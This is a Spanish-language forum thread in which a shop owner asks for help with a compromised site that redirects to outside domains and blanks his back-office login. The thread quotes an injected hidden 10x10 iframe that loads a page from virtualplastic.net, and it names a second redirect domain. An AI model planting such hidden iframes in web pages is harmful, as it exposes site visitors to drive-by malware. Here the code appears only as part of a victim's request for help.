Jump to content

Problemas de acceso a mi BackOffice


PedroSP

Recommended Posts

Hola, lo primero pedir disculpas por si estoy poniendo este post donde no deberia de ponerlo, si es asi os agradeceria que me dijerais donde ponerlo GRACIASSSSS

 

Tengo un problema desde hace unos dias de acceso a mi web, ya restaure la web pero me ha vuelto a pasar. Cuando intento acceder a mi backoffice despues de poner mi usuario y contraseña no me accede y se queda la web en blanco.

 

Lo unico que he observado que al intentar entrar a la web me redirecciona a 2 webs distintas:

 

dzhamilyavauhm.dlinkddns.com

 

virtualplastic.net

 

 

 

Tengo lineas de codigo de mi web como esta

 

<iframe src="http://virtualplastic.net/grigri/goodies/.bin/trados/index.php" width="10" border="1" height="10" style="visibility:hidden"></iframe>

 

 

Por favor si a alguien le ha pasado o sabe como solucionarlo lo agradeceria porque ahora mismo tengo parada la web.

 

Podeis contactar conmigo [email protected]

 

MUCHAS GRACIAS

Link to comment
Share on other sites

Hola, lo primero pedir disculpas por si estoy poniendo este post donde no deberia de ponerlo, si es asi os agradeceria que me dijerais donde ponerlo GRACIASSSSS

 

Tengo un problema desde hace unos dias de acceso a mi web, ya restaure la web pero me ha vuelto a pasar. Cuando intento acceder a mi backoffice despues de poner mi usuario y contraseña no me accede y se queda la web en blanco.

 

 

Respecto al acceso al panel de administración de tu tienda:

 

Comentas que cuando entras al panel de tu tienda, se te queda en blanco la pantalla?, Si es asi, activa los errores modificando el fichero /config/config.inc.php

 

Busca la siguiente linea:

 

@ini_set('display_errors', 'off');

 

Y cámbiala por esta:

 

@ini_set('display_errors', 'on');

 

Vuelve a entrar al panel de tu tienda, y dime si se te vuelve a quedar en blanco o te muestra un error.

 

Un Saludo

Link to comment
Share on other sites

Hola, hice lo que me comentaste, aparte detecte muchos archivos .php modificados con iframes etc añadidos.

 

Modifique todo eso y por ahora la cosa parece que funcionaba, pero hoy me dice el firefox que mi web es una "web atacante"

 

Alguna ayuda con respecto a esto???

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
×
×
  • Create New...